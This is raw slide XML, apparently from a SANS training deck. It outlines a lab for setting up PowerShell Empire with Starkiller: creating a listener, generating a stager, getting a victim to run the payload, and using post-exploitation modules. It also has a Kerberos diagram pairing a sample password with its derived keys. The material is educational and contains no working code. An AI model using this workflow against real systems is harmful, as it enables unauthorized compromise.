            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-empire in a console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wait until you see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>starkiller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web interface come up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>starkiller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate a stager (payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get payload executed by victim (this is the hard part usually)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interact with agent, enjoy a ton of built in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modules!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25152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F5CB9-ACF7-45A6-216F-2EA7E7C77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69C28-6A0B-0260-0D83-C647FE6BC4DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666426" y="2213642"/>
            <a:ext cx="11525574" cy="2061861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial Empire Setup and Agent Callback</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F30AEDAF-B59B-3714-5328-A94BDFED8C61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317133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06E6-1D7C-B7A6-83C1-065622D7F95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038872-9213-419E-7172-12571820CB8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2025 SANS Institute | All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47098AC2-2D7B-9D30-9D30-09E84A0EF1CB}"/>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Kerberos authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D67B745-3980-D37C-67DF-5055BFAFE293}"/>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7077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347C0-87C3-3B0C-82FE-12A8BE4975A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="5286376"/>
            <a:ext cx="11334750" cy="1146174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The diagram on this slide provides an overview of how Kerberos works when the "rc4_hmac_md5" encryption type is used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B0F1939-5C96-DE9B-FD0F-FB4DECE244FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="300" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EF8594F-E24E-9BD6-7284-DDDB9ED9A4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3172618" y="1431715"/>
            <a:ext cx="6132401" cy="2790148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="65000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>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LSASS (kerberos.DLL)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="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2A536A05-AF03-D999-4375-917038C57BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3528287" y="1819663"/>
            <a:ext cx="1506814" cy="437819"/>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des_cbc_md5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9990956-F42D-CFC7-047E-59C46CABFFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524582" y="2398569"/>
            <a:ext cx="1506814" cy="437819"/>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rc4_hmac_md5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F04F31-AB2F-4263-8D61-FAE81BDB4863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150304" y="1819662"/>
            <a:ext cx="2680234" cy="437819"/>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pt-BR" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a94a8fe5ccb19ba6</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A42091-C37A-668B-45D2-904E331254CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150304" y="2395140"/>
            <a:ext cx="2680234" cy="437819"/>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050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>d44d5e0591cb0f6ecb6d6a86ec9a12da</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Arrow: Curved Down 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3723B774-4609-2CC6-48AD-718FFD657718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981515" y="2030640"/>
            <a:ext cx="1600844" cy="351622"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 94881"/>
              <a:gd name="adj3" fmla="val 25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BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E356178-2D95-6978-0249-0AD46EDA4541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="1208392"/>
            <a:ext cx="1769921" cy="550396"/>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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allan.marshall</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Awesomesauce123</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="male user icon by acspike">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9C431A-686A-BF87-521F-E733D5869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1923634"/>
            <a:ext cx="749864" cy="72652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42B8AD3-0F36-0AA8-1AB8-A4F9AC24DAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3528287" y="2956985"/>
            <a:ext cx="1506814" cy="437819"/>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aes128_hmac</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBDF3099-CB68-2574-4588-44B5E0A129C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524582" y="3535891"/>
            <a:ext cx="1506814" cy="43781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aes256_hmac</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FAF8332-D2C7-B508-B82B-0D97BDA20C61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5141876" y="2956985"/>
            <a:ext cx="2680234" cy="437819"/>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050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>8451bb37aa6d7ce3d2a5c2d24d317af3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A361D3A-D9B6-879C-537D-6CCFAFF2FAC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150304" y="3536101"/>
            <a:ext cx="2680234" cy="437819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f6e456436ef5d664290885dadfa879da</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>9e5caae0f8ceeae93305a4ae35c85d04</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Alternate Process 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4CC000-3E81-1A31-AD4F-4ABA6BC05135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356248" y="2499591"/>
            <a:ext cx="709141" cy="309900"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flowchart: Alternate Process 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECF5E46-546C-DCC3-1935-4079CBAC2AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8336049" y="3424883"/>
            <a:ext cx="709141" cy="421118"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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ST (TGS)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B389B8CB-1A1B-6AFC-E4F2-60D65F569499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9814564" y="3604172"/>
            <a:ext cx="823410" cy="997954"/>
            <a:chOff x="10798720" y="4898278"/>
            <a:chExt cx="1168889" cy="1474940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36937604-E6E1-0774-1A80-1297EE8E5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720" y="4898278"/>
              <a:ext cx="737960" cy="12222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older by computating">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E72209B4-1F52-EB56-3F0F-A972B332D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86" y="5548595"/>
              <a:ext cx="824623" cy="82462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9A8CA846-FAE3-7C3F-E5A4-3B85F0C04F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9814563" y="4633783"/>
            <a:ext cx="823410" cy="438280"/>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File Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connector: Curved 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A1FB65-755D-FA2E-51F9-3AD8DAB8719B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7830538" y="1570174"/>
            <a:ext cx="1757257" cy="1043876"/>
          </a:xfrm>
